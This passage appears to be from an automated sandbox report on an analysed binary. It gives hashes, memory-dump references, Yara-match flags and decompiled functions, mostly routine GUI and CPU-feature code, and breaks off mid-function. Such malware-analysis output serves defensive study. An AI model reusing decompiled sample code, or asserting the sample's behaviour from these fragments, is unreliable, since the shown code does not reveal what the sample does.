                  • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                  • Instruction ID: 0451bc3f7085c55dd80b8021edb13407b45da67656bedde078cd860edbe13189
                  • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                  • Instruction Fuzzy Hash: 9E1170B23401049FDB54DF55DC81EB773EAEBC8320B29845AEE04CB312D679E802C760
                  Uniqueness

                  Uniqueness Score: 0.00%

                  C-Code - Quality: 58%
                  			E004093C0(signed int __edx) {
                  				intOrPtr _v8;
                  				signed int _v12;
                  				char _v20;
                  				intOrPtr _v28;
                  				intOrPtr _v32;
                  				signed int _v36;
                  				signed int _t15;
                  				intOrPtr _t21;
                  				signed int _t31;
                  				void* _t32;
                  
                  				_push(0xfffffffe);
                  				_push(0x445e20);
                  				_push(E00427FC0);
                  				_push( *[fs:0x0]);
                  				_t15 =  *0x44c364; // 0xa6e2bca1
                  				_v12 = _v12 ^ _t15;
                  				_push(_t15 ^ _t31);
                  				 *[fs:0x0] =  &_v20;
                  				_v28 = _t32 + 0xffffffec;
                  				_v32 = 0x800000;
                  				_v36 = 0;
                  				_v8 = 0;
                  				asm("cpuid");
                  				_v36 = __edx;
                  				_v8 = 0xfffffffe;
                  				if((_v36 & 0x00800000) == 0) {
                  					_t21 = 0;
                  				} else {
                  					_v8 = 1;
                  					asm("pxor mm0, mm0");
                  					asm("emms");
                  					_v8 = 0xfffffffe;
                  					_t21 = 1;
                  				}
                  				 *[fs:0x0] = _v20;
                  				return _t21;
                  			}

                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 62f0d718f056e22e68c5245a076e8271a2bffbbef3574870f5ea1f41db7055fd
                  • Instruction ID: f136387efd5145fb582a75416f10b6cd11d69b61af36e65ba8ce89701aa617f2
                  • Opcode Fuzzy Hash: 62f0d718f056e22e68c5245a076e8271a2bffbbef3574870f5ea1f41db7055fd
                  • Instruction Fuzzy Hash: 1F0140B1908709DBCB10CF98CD41BDEFBB4FB45724F20826AE421A76D0D37959069A95
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Memory Dump Source
                  • Source File: 00000004.00000002.297282519.00521000.00000020.00000001.sdmp, Offset: 00521000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_521000_982.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 35fae48b58514328602f79420b2e81abbf1084ebf9a99db8433c1080f312f74a
                  • Instruction ID: c5910a3fe3934315d131e2795996df9cec5f9f5fe406650d67740f7896e745c2
                  • Opcode Fuzzy Hash: 35fae48b58514328602f79420b2e81abbf1084ebf9a99db8433c1080f312f74a
                  • Instruction Fuzzy Hash: 75019278E10219EFCB48DF98D5909AEFBB5FF89310F608599E809A7741D730AE41DB80
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Memory Dump Source
                  • Source File: 00000004.00000002.297282519.00521000.00000020.00000001.sdmp, Offset: 00521000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_521000_982.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2bcb60f536e0ace9363e1095d119401d239975132a0b2009284b610fb2bfc0a9
                  • Instruction ID: 852107d55cec2bc02274fe481af1345a28a731c2358f99e94e2336a088162ab1
                  • Opcode Fuzzy Hash: 2bcb60f536e0ace9363e1095d119401d239975132a0b2009284b610fb2bfc0a9
                  • Instruction Fuzzy Hash: 85018078E04219EFCB48DF98D5909AEFBB5FF49310F208599E819A7341E730AE41DB80
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Memory Dump Source
                  • Source File: 00000004.00000002.296876594.002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_2c0000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2bcb60f536e0ace9363e1095d119401d239975132a0b2009284b610fb2bfc0a9
                  • Instruction ID: 8eca524bbff7ef7d6ef7583c13bec2c9ce79c0cd0d89afd824687c3f1b8869bb
                  • Opcode Fuzzy Hash: 2bcb60f536e0ace9363e1095d119401d239975132a0b2009284b610fb2bfc0a9
                  • Instruction Fuzzy Hash: FA018078A10109EFCB44DF98C590DAEF7B5FF48310B248699E909A7701DB30AE51DB80
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Memory Dump Source
                  • Source File: 00000004.00000002.296876594.002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_2c0000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 35fae48b58514328602f79420b2e81abbf1084ebf9a99db8433c1080f312f74a
                  • Instruction ID: 7335dee473d7aa6d1308b5b7905c2da32f120fbedb10214d1351a18a7ee788d2
                  • Opcode Fuzzy Hash: 35fae48b58514328602f79420b2e81abbf1084ebf9a99db8433c1080f312f74a
                  • Instruction Fuzzy Hash: BA019278A10109EFCB44DF98C590DAEF7B5FB48310F248699E919A7705DB70AE51DB80
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Memory Dump Source
                  • Source File: 00000004.00000002.296876594.002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_2c0000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8ad48bf59bba2d8cda96442d10b01183ac7760b7c19d3faa8316632ce25345ad
                  • Instruction ID: f773f099e0f5c65842438b370e0be2afee82d0f17cf1c1a6f99e0dc617a9ed0f
                  • Opcode Fuzzy Hash: 8ad48bf59bba2d8cda96442d10b01183ac7760b7c19d3faa8316632ce25345ad
                  • Instruction Fuzzy Hash: 8AE04F32330410CBC621DE99D580E69F3A5EB847B032A096ED54A93601CA60BD289A40
                  Uniqueness

                  Uniqueness Score: 0.00%

                  C-Code - Quality: 100%
                  			E00407F70(void* __ecx) {
                  				intOrPtr _v8;
                  
                  				_v8 =  *[fs:0x30];
                  				return _v8;
                  			}




                  0x00407f7a
                  0x00407f83

                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3585cc5e86e4b4f2c0b231822883ac188ad7ac996d5f3a190238e1ab2981f7b1
                  • Instruction ID: 3aed54436f5767a83b01f55326dea564c088d466d319321e9a1229c6b183aa19
                  • Opcode Fuzzy Hash: 3585cc5e86e4b4f2c0b231822883ac188ad7ac996d5f3a190238e1ab2981f7b1
                  • Instruction Fuzzy Hash: DCC04C7595664CEBC711CB89D541A59B7FCE709650F100195EC0893700D5356E109595
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Memory Dump Source
                  • Source File: 00000004.00000002.296876594.002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_2c0000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 98b478bd1af69a2275d0ab39f1ac079ffe73a0c4551ec61df12d917ad4ecd62f
                  • Instruction ID: dd1ea78877d89c8c1f21003391c56dd86dd10fe21c56db2a52adb93900471d7c
                  • Opcode Fuzzy Hash: 98b478bd1af69a2275d0ab39f1ac079ffe73a0c4551ec61df12d917ad4ecd62f
                  • Instruction Fuzzy Hash: 8EA00275752980CFCE12CB09C394F9073F4F744B41F0504F1E80997A11C238A900CA00
                  Uniqueness

                  Uniqueness Score: 0.00%

                  C-Code - Quality: 74%
                  			E0041FA76(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                  				int _t196;
                  				int _t200;
                  				intOrPtr _t208;
                  				intOrPtr* _t216;
                  				signed char _t224;
                  				signed char _t231;
                  				long _t266;
                  				long _t267;
                  				long _t313;
                  				long _t320;
                  				intOrPtr _t330;
                  				intOrPtr _t388;
                  				intOrPtr _t390;
                  				intOrPtr _t392;
                  				int _t393;
                  				intOrPtr* _t399;
                  				void* _t400;
                  				void* _t403;
                  
                  				_t403 = __eflags;
                  				_t388 = __edx;
                  				E0042922B(E004394AE, __ebx, __edi, __esi);
                  				 *((intOrPtr*)(_t400 - 0x34)) = __ecx;
                  				E00410F00(__ebx, _t400 - 0x30, __edi, __esi, _t403);
                  				_t390 =  *((intOrPtr*)(_t400 + 8));
                  				 *((intOrPtr*)(_t400 - 4)) = 0;
                  				_t399 = E00414668(0, _t400 - 0x30, _t390, __esi, _t403,  *((intOrPtr*)(_t390 + 0x18)));
                  				 *((intOrPtr*)(_t400 - 0x50)) =  *((intOrPtr*)( *_t399 + 0x1c))(0x43de78, 0xac);
                  				E004281D0(_t390, _t400 - 0xb8, 0, 0x30);
                  				 *(_t400 - 0xb8) = 0x30;
                  				 *((intOrPtr*)(_t400 - 0xb4)) = 0x40;
                  				 *(_t400 - 0x18) = 0;
                  				_t196 = GetMenuItemInfoW( *( *((intOrPtr*)(_t400 - 0x34)) + 4),  *(_t390 + 8), 0, _t400 - 0xb8);
                  				_t404 = _t196;
                  				if(_t196 != 0) {
                  					_t330 = E00405860(_t400 - 0x30, _t404,  *((intOrPtr*)(_t400 - 0x90)));
                  					 *((intOrPtr*)(_t400 - 0x90)) =  *((intOrPtr*)(_t400 - 0x90)) + 1;
                  					 *((intOrPtr*)(_t400 - 0x94)) = _t330;
                  					 *(_t400 - 0x18) = GetMenuItemInfoW( *( *((intOrPtr*)(_t400 - 0x34)) + 4),  *(_t390 + 8), 0, _t400 - 0xb8);
                  					E0040E100(0, _t400 - 0x30, _t390, 0xffffffff);
                  				}
                  				 *((intOrPtr*)(_t400 - 0x38)) =  *((intOrPtr*)(_t390 + 0x2c));
                  				E00415CDB(_t400 - 0x78, _t390 + 0x1c);
                  				_t392 =  *((intOrPtr*)(_t400 - 0x38));
                  				if(_t392 == 0 || E0041EF6A(_t392, ?str?) == 0) {
                  					 *(_t400 - 0x3c) = 0;
                  					_t393 = GetSystemMetrics(0x32);
                  					_t200 = GetSystemMetrics(0x31);
                  				} else {
                  					 *(_t400 - 0x3c) = 1;
                  					GetObjectW( *(_t392 + 4), 0x18, _t400 - 0x68);
                  					_t393 =  *((intOrPtr*)(_t400 - 0x60));
                  					_t200 =  *(_t400 - 0x64);
                  				}
                  				 *(_t400 - 0x1c) = _t200;
                  				asm("cdq");
                  				asm("cdq");
                  				_t208 = ( *((intOrPtr*)(_t400 - 0x6c)) -  *((intOrPtr*)(_t400 - 0x74)) - _t388 >> 1) - (_t393 - _t388 >> 1) +  *((intOrPtr*)(_t400 - 0x74)) - 1;
                  				 *((intOrPtr*)(_t400 - 0x20)) = _t393 + 1 + _t208;
                  				 *((intOrPtr*)(_t400 - 0x28)) = _t208;
                  				 *(_t400 - 0x2c) = 0;
                  				 *((intOrPtr*)(_t400 - 0x24)) =  *(_t400 - 0x1c) + 1;
                  				 *(_t400 - 0x1c) = GetSysColor(4);
                  				E004141D8(_t400 - 0x88);
                  				 *((char*)(_t400 - 4)) = 1;
                  				E004149F6(_t400 - 0x88, 0);
                  				 *((intOrPtr*)( *_t399 + 0x28))( *((intOrPtr*)(_t400 - 0x34)) + 8);
                  				_t216 = E0041AA1C(_t399, _t400 - 0x14, _t400 - 0x30);
                  				 *((intOrPtr*)(_t400 - 0x40)) =  *((intOrPtr*)(_t216 + 4));
                  				_t218 =  *((intOrPtr*)(_t400 + 8));
                  				 *((intOrPtr*)(_t400 - 0x44)) =  *_t216;
                  				if(( *( *((intOrPtr*)(_t400 + 8)) + 0x10) & 0x00000001) == 0) {
                  					E00421A9A(_t399, _t218 + 0x1c,  *(_t400 - 0x1c));
                  					 *((intOrPtr*)( *_t399 + 0x2c))( *(_t400 - 0x1c));
                  					_t224 =  *( *((intOrPtr*)(_t400 + 8)) + 0x10);
                  					__eflags = _t224 & 0x00000002;
                  					if((_t224 & 0x00000002) == 0) {
                  						__eflags =  *(_t400 - 0x3c);
                  						if( *(_t400 - 0x3c) != 0) {
                  							__eflags = _t224 & 0x00000008;
                  							if((_t224 & 0x00000008) != 0) {
                  								 *((intOrPtr*)(_t400 - 0x10)) =  *((intOrPtr*)(_t400 - 0x20)) -  *((intOrPtr*)(_t400 - 0x28));
                  								 *((intOrPtr*)(_t400 - 0x34)) =  *((intOrPtr*)(_t400 - 0x24)) -  *(_t400 - 0x2c);
                  								_t266 = GetSysColor(0x14);
                  								_t267 = GetSysColor(0x10);
                  								__eflags =  *((intOrPtr*)(_t400 - 0x34)) + 1;
                  								E00421C5E(_t399,  *((intOrPtr*)(_t400 - 0x34)) + 1,  *(_t400 - 0x2c),  *((intOrPtr*)(_t400 - 0x28)),  *((intOrPtr*)(_t400 - 0x34)) + 1,  *((intOrPtr*)(_t400 - 0x10)) + 1, _t267, _t266);
                  							}
                  						}
                  						__eflags =  *(_t400 - 0x18);
                  						if(__eflags == 0) {
                  							goto L25;
                  						} else {
                  							 *((intOrPtr*)( *_t399 + 0x2c))( *(_t400 - 0x1c));
                  							 *((intOrPtr*)(_t400 - 0x10)) =  *_t399;
                  							 *((intOrPtr*)( *((intOrPtr*)(_t400 - 0x10)) + 0x30))(GetSysColor(7));
                  							goto L23;
                  						}
                  					}
                  					 *((intOrPtr*)(_t400 - 0x10)) =  *_t399;
                  					 *((intOrPtr*)( *((intOrPtr*)(_t400 - 0x10)) + 0x30))(GetSysColor(0x14));
                  					E00413F50(_t399, 1);
                  					__eflags =  *(_t400 - 0x18);
                  					if(__eflags == 0) {
                  						goto L25;
                  					}
                  					asm("cdq");
                  					 *(_t400 - 0x18) =  *((intOrPtr*)(_t400 - 0x40)) - _t388;
                  					 *(_t400 - 0x18) =  *(_t400 - 0x18) >> 1;
                  					asm("cdq");
                  					E0041F86F(_t399,  *((intOrPtr*)(_t400 - 0x24)) + 4, ( *((intOrPtr*)(_t400 - 0x20)) -  *((intOrPtr*)(_t400 - 0x28)) - _t388 >> 1) -  *(_t400 - 0x18) +  *((intOrPtr*)(_t400 - 0x28)) + 1, 2, 0, _t400 - 0x30, 0);
                  					 *((intOrPtr*)(_t400 - 0x10)) =  *_t399;
                  					 *((intOrPtr*)( *((intOrPtr*)(_t400 - 0x10)) + 0x30))(GetSysColor(0x11));
                  					_push(0);
                  					_push(_t400 - 0x30);
                  					_push(0);
                  					asm("cdq");
                  					_push(0);
                  					_push(( *((intOrPtr*)(_t400 - 0x20)) -  *((intOrPtr*)(_t400 - 0x28)) - _t388 >> 1) -  *(_t400 - 0x18) +  *((intOrPtr*)(_t400 - 0x28)));
                  					goto L24;
                  				} else {
                  					E00415CDB(_t400 - 0x60, _t218 + 0x1c);
                  					 *((intOrPtr*)(_t400 - 0x60)) =  *((intOrPtr*)(_t400 - 0x24)) + 2;
                  					E00421A9A(_t399, _t400 - 0x60, GetSysColor(0xd));
                  					if( *(_t400 - 0x3c) != 0 && ( *( *((intOrPtr*)(_t400 + 8)) + 0x10) & 0x0000000a) == 0) {
                  						 *((intOrPtr*)(_t400 - 0x34)) =  *((intOrPtr*)(_t400 - 0x20)) -  *((intOrPtr*)(_t400 - 0x28));
                  						 *((intOrPtr*)(_t400 - 0x10)) =  *((intOrPtr*)(_t400 - 0x24)) -  *(_t400 - 0x2c);
                  						_t320 = GetSysColor(0x10);
                  						E00421C5E(_t399,  *((intOrPtr*)(_t400 - 0x10)) + 1,  *(_t400 - 0x2c),  *((intOrPtr*)(_t400 - 0x28)),  *((intOrPtr*)(_t400 - 0x10)) + 1,  *((intOrPtr*)(_t400 - 0x34)) + 1, GetSysColor(0x14), _t320);
                  					}
                  					if( *(_t400 - 0x18) == 0) {
                  						L25:
                  						if( *(_t400 - 0x3c) == 0) {
                  							L32:
                  							 *((intOrPtr*)( *_t399 + 0x20))( *((intOrPtr*)(_t400 - 0x50)));
                  							 *((char*)(_t400 - 4)) = 0;
                  							E004146E5(_t400 - 0x88);
                  							return E00429303(E004055F0( *((intOrPtr*)(_t400 - 0x30)) + 0xfffffff0));
                  						}
                  						 *((intOrPtr*)(_t400 - 0x10)) = 0;
                  						 *((intOrPtr*)(_t400 - 0x14)) = 0x43ea08;
                  						_t231 =  *( *((intOrPtr*)(_t400 + 8)) + 0x10);
                  						 *((char*)(_t400 - 4)) = 2;
                  						_t417 = _t231 & 0x00000002;
                  						if((_t231 & 0x00000002) == 0) {
                  							__eflags = _t231 & 0x00000008;
                  							if(__eflags == 0) {
                  								L31:
                  								E004141D8(_t400 - 0x4c);
                  								 *((char*)(_t400 - 4)) = 3;
                  								E004149F6(_t400 - 0x4c, 0);
                  								E00414B47(_t400 - 0x4c,  *((intOrPtr*)(_t400 - 0x38)));
                  								InflateRect(_t400 - 0x2c, 0xffffffff, 0xffffffff);
                  								E004141A6(_t399,  *(_t400 - 0x2c),  *((intOrPtr*)(_t400 - 0x28)),  *((intOrPtr*)(_t400 - 0x24)),  *((intOrPtr*)(_t400 - 0x20)), _t400 - 0x4c, 0, 0, 0xcc0020);
                  								 *((char*)(_t400 - 4)) = 2;
                  								E004146E5(_t400 - 0x4c);
                  								 *((char*)(_t400 - 4)) = 1;
                  								 *((intOrPtr*)(_t400 - 0x14)) = 0x43ea08;
                  								E00414B63(0, _t400 - 0x14, 0x43ea08, _t399, _t417);
                  								goto L32;
                  							}
                  							_push(0xffffff);
                  							_push( *(_t400 - 0x1c));
                  							_push(_t400 - 0x14);
                  							_push( *((intOrPtr*)(_t400 - 0x38)));
                  							E00414ED8(0, 0x43ea08, _t399, __eflags);
                  							L30:
                  							 *((intOrPtr*)(_t400 - 0x38)) = _t400 - 0x14;
                  							goto L31;
                  						}
                  						_push( *(_t400 - 0x1c));
                  						_push(_t400 - 0x14);
                  						_push( *((intOrPtr*)(_t400 - 0x38)));
                  						E00414C81(0, 0x43ea08, _t399, _t417);
                  						goto L30;
                  					} else {
                  						 *((intOrPtr*)(_t400 - 0x10)) =  *_t399;
                  						 *((intOrPtr*)( *((intOrPtr*)(_t400 - 0x10)) + 0x2c))(GetSysColor(0xd));
                  						if(( *( *((intOrPtr*)(_t400 + 8)) + 0x10) & 0x00000002) == 0) {
                  							_t313 = GetSysColor(0xe);
                  						} else {
                  							_t313 =  *(_t400 - 0x1c);
                  						}
                  						_t388 =  *_t399;
                  						 *((intOrPtr*)(_t388 + 0x30))(_t313);
                  						L23:
                  						_push(0);
                  						_push(_t400 - 0x30);
                  						_push(0);
                  						asm("cdq");
                  						asm("cdq");
                  						_push(2);
                  						_push(( *((intOrPtr*)(_t400 - 0x20)) -  *((intOrPtr*)(_t400 - 0x28)) - _t388 >> 1) - ( *((intOrPtr*)(_t400 - 0x40)) - _t388 >> 1) +  *((intOrPtr*)(_t400 - 0x28)));
                  						L24:
                  						_push( *((intOrPtr*)(_t400 - 0x24)) + 3);
                  						E0041F86F(_t399);
                  						goto L25;
                  					}
                  				}
                  			}






















                  APIs
                  • __EH_prolog3.LIBCMT ref: 0041FA80
                    • Part of subcall function 00410F00: __EH_prolog3.LIBCMT ref: 00410F07
                    • Part of subcall function 00410F00: _DebugHeapAllocator.LIBCPMTD ref: 00410F35
                  • _memset.LIBCMT ref: 0041FABB
                  • GetMenuItemInfoW.USER32 ref: 0041FAEC
                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0041FB22
                  • GetObjectW.GDI32(?,00000018,?), ref: 0041FB6E
                  • GetSystemMetrics.USER32(00000032), ref: 0041FB81
                  • GetSystemMetrics.USER32(00000031), ref: 0041FB8B
                  • GetSysColor.USER32(00000004), ref: 0041FBCC
                  • GetSysColor.USER32(0000000D), ref: 0041FC38
                  • GetSysColor.USER32(00000010), ref: 0041FC68
                  • GetSysColor.USER32(00000014), ref: 0041FC6D
                  • GetSysColor.USER32(0000000D), ref: 0041FC97
                  • GetSysColor.USER32(0000000E), ref: 0041FCB2
                    • Part of subcall function 00421A9A: SetBkColor.GDI32(?,?), ref: 00421ABE
                    • Part of subcall function 00421A9A: ExtTextOutW.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 00421AD1
                  • GetSysColor.USER32(00000014), ref: 0041FCEE
                    • Part of subcall function 00413F50: SetBkMode.GDI32(?,?), ref: 00413F6D
                    • Part of subcall function 00413F50: SetBkMode.GDI32(?,?), ref: 00413F7A
                    • Part of subcall function 0041F86F: ExtTextOutW.GDI32(?,?,?,?,?,?,?,?), ref: 0041F890
                  • GetSysColor.USER32(00000011), ref: 0041FD49
                  • GetSysColor.USER32(00000014), ref: 0041FD8F
                  • GetSysColor.USER32(00000010), ref: 0041FD94
                  • GetSysColor.USER32(00000007), ref: 0041FDC4
                  • InflateRect.USER32(?,000000FF,000000FF), ref: 0041FE79
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Color$H_prolog3InfoItemMenuMetricsModeSystemText$AllocatorDebugHeapInflateObjectRect_memset
                  • String ID: 0$@$BAA$tC
                  • API String ID: 1068847707-438587363
                  • Opcode ID: 1c84f6ecd1dcc19654c694ace591c06d12c55800a49cd53d1384043263fda5c0
                  • Instruction ID: eda40932cf3d49eb725eaa5344293dbe4309d1e7163b6a347a27f5c3417c4cb1
                  • Opcode Fuzzy Hash: 1c84f6ecd1dcc19654c694ace591c06d12c55800a49cd53d1384043263fda5c0
                  • Instruction Fuzzy Hash: 46F13971A00219AFCF04DFA9CD85EEEBBB9BF48304F14411AF505A7291DB34AA45CF64
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 93%
                  			E00427129(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr _t114;
                  				signed int _t116;
                  				signed int _t118;
                  				intOrPtr _t122;
                  				long _t131;
                  				signed int _t138;
                  				signed int _t139;
                  				void* _t143;
                  				signed int _t147;
                  				signed int _t148;
                  				void* _t156;
                  				intOrPtr* _t163;
                  				signed int _t175;
                  				signed int _t176;
                  				signed int _t179;
                  				void* _t181;
                  				signed short _t190;
                  				intOrPtr _t192;
                  				void* _t200;
                  				void* _t204;
                  				void* _t205;
                  				void* _t207;
                  
                  				_t165 = __ecx;
                  				_push(0x7c);
                  				_t109 = E0042922B(E004399AB, __ebx, __edi, __esi);
                  				_t200 = __ecx;
                  				 *(_t204 - 0x10) = __ecx;
                  				_t163 =  *((intOrPtr*)(_t204 + 8));
                  				_t190 =  *(_t163 + 4);
                  				 *(_t204 - 0x1c) = _t190;
                  				if(_t190 == 0x200 || _t190 == 0xa0 || _t190 == 0x202 || _t190 == 0x205 || _t190 == 0x208) {
                  					if(GetKeyState(1) < 0 || GetKeyState(2) < 0) {
                  						L49:
                  						_t190 =  *(_t204 - 0x1c);
                  						goto L50;
                  					} else {
                  						_t109 = GetKeyState(4);
                  						_t217 = _t109;
                  						if(_t109 < 0) {
                  							goto L49;
                  						} else {
                  							_t114 = E00420870(_t163, _t165, GetKeyState, _t200, _t217);
                  							_push( *_t163);
                  							_t192 = _t114;
                  							 *((intOrPtr*)(_t204 - 0x18)) = _t192;
                  							while(1) {
                  								_t109 = E0040E20E(_t163, _t165);
                  								if(_t109 == 0) {
                  									break;
                  								}
                  								__eflags =  *(_t109 + 0x3c) & 0x00000401;
                  								if(( *(_t109 + 0x3c) & 0x00000401) != 0) {
                  									break;
                  								} else {
                  									_push(GetParent( *(_t109 + 0x20)));
                  									continue;
                  								}
                  							}
                  							if(_t109 == _t200) {
                  								_t164 =  *(_t192 + 0x3c);
                  								 *(_t204 - 0x14) = E0040E514(_t200);
                  								__eflags = _t164;
                  								if(__eflags == 0) {
                  									L19:
                  									_t116 = E0040B71F(__eflags, 0x70);
                  									 *(_t204 - 0x1c) = _t116;
                  									_t164 = 0;
                  									 *(_t204 - 4) = 0;
                  									__eflags = _t116;
                  									if(__eflags != 0) {
                  										_t164 = E00426E40(0, _t116, _t192, _t200, __eflags);
                  									}
                  									 *(_t204 - 4) =  *(_t204 - 4) | 0xffffffff;
                  									_t118 =  *((intOrPtr*)( *_t164 + 0x13c))( *(_t204 - 0x14), 1);
                  									__eflags = _t118;
                  									if(_t118 != 0) {
                  										SendMessageW( *(_t164 + 0x20), 0x401, 0, 0);
                  										_t200 =  *(_t204 - 0x10);
                  										 *(_t192 + 0x3c) = _t164;
                  										L24:
                  										E004281D0(_t192, _t204 - 0x88, 0, 0x30);
                  										_t122 =  *((intOrPtr*)(_t204 + 8));
                  										 *((intOrPtr*)(_t204 - 0x24)) =  *((intOrPtr*)(_t122 + 0x18));
                  										 *(_t204 - 0x28) =  *(_t122 + 0x14);
                  										ScreenToClient( *(_t200 + 0x20), _t204 - 0x28);
                  										E004281D0(_t192, _t204 - 0x58, 0, 0x30);
                  										_t207 = _t205 + 0x18;
                  										 *(_t204 - 0x58) = 0x2c;
                  										_t109 =  *((intOrPtr*)( *_t200 + 0x74))( *(_t204 - 0x28),  *((intOrPtr*)(_t204 - 0x24)), _t204 - 0x58);
                  										asm("sbb ecx, ecx");
                  										_t175 =  ~(_t109 + 1) & _t200;
                  										 *(_t204 - 0x1c) = _t109;
                  										 *(_t204 - 0x14) = _t175;
                  										__eflags =  *(_t192 + 0x44) - _t109;
                  										if( *(_t192 + 0x44) != _t109) {
                  											L30:
                  											__eflags = _t109 - 0xffffffff;
                  											if(_t109 == 0xffffffff) {
                  												SendMessageW( *(_t164 + 0x20), 0x401, 0, 0);
                  												L39:
                  												E004270A9(_t164,  *((intOrPtr*)(_t204 + 8)));
                  												_t131 =  *(_t192 + 0x48);
                  												__eflags = _t131;
                  												if(_t131 != 0) {
                  													__eflags =  *_t131 - 0x2c;
                  													if( *_t131 >= 0x2c) {
                  														SendMessageW( *(_t164 + 0x20), 0x433, 0, _t131);
                  													}
                  												}
                  												 *(_t192 + 0x40) =  *(_t204 - 0x14);
                  												 *(_t192 + 0x44) =  *(_t204 - 0x1c);
                  												__eflags =  *(_t192 + 0x48);
                  												if(__eflags == 0) {
                  													 *(_t192 + 0x48) = E0040B71F(__eflags, 0x30);
                  													E004281D0(_t192, _t134, 0, 0x30);
                  													_t207 = _t207 + 0x10;
                  												}
                  												_t176 = 0xc;
                  												_t200 = _t204 - 0x58;
                  												_t109 = memcpy( *(_t192 + 0x48), _t200, _t176 << 2);
                  												_t192 = _t200 + _t176 + _t176;
                  												L45:
                  												__eflags =  *((intOrPtr*)(_t204 - 0x34)) - 0xffffffff;
                  												if( *((intOrPtr*)(_t204 - 0x34)) != 0xffffffff) {
                  													__eflags =  *(_t204 - 0x38);
                  													if(__eflags == 0) {
                  														_push( *((intOrPtr*)(_t204 - 0x34)));
                  														_t109 = E00428397(_t164, _t192, _t200, __eflags);
                  													}
                  												}
                  												goto L77;
                  											}
                  											_t179 = 0xc;
                  											_t138 = memcpy(_t204 - 0x88, _t204 - 0x58, _t179 << 2);
                  											_t207 = _t207 + 0xc;
                  											_t181 =  *(_t204 - 0x10);
                  											_t139 = _t138 & 0x3fffffff;
                  											 *(_t204 - 0x84) = _t139;
                  											__eflags =  *(_t181 + 0x3c) & 0x00000400;
                  											if(( *(_t181 + 0x3c) & 0x00000400) != 0) {
                  												_t148 = _t139 | 0x00000020;
                  												__eflags = _t148;
                  												 *(_t204 - 0x84) = _t148;
                  											}
                  											SendMessageW( *(_t164 + 0x20), 0x432, 0, _t204 - 0x88);
                  											__eflags =  *(_t204 - 0x54) & 0x40000000;
                  											if(( *(_t204 - 0x54) & 0x40000000) != 0) {
                  												L35:
                  												SendMessageW( *(_t164 + 0x20), 0x401, 1, 0);
                  												_t143 =  *(_t204 - 0x10);
                  												__eflags =  *(_t143 + 0x3c) & 0x00000400;
                  												if(( *(_t143 + 0x3c) & 0x00000400) != 0) {
                  													SendMessageW( *(_t164 + 0x20), 0x411, 1, _t204 - 0x88);
                  												}
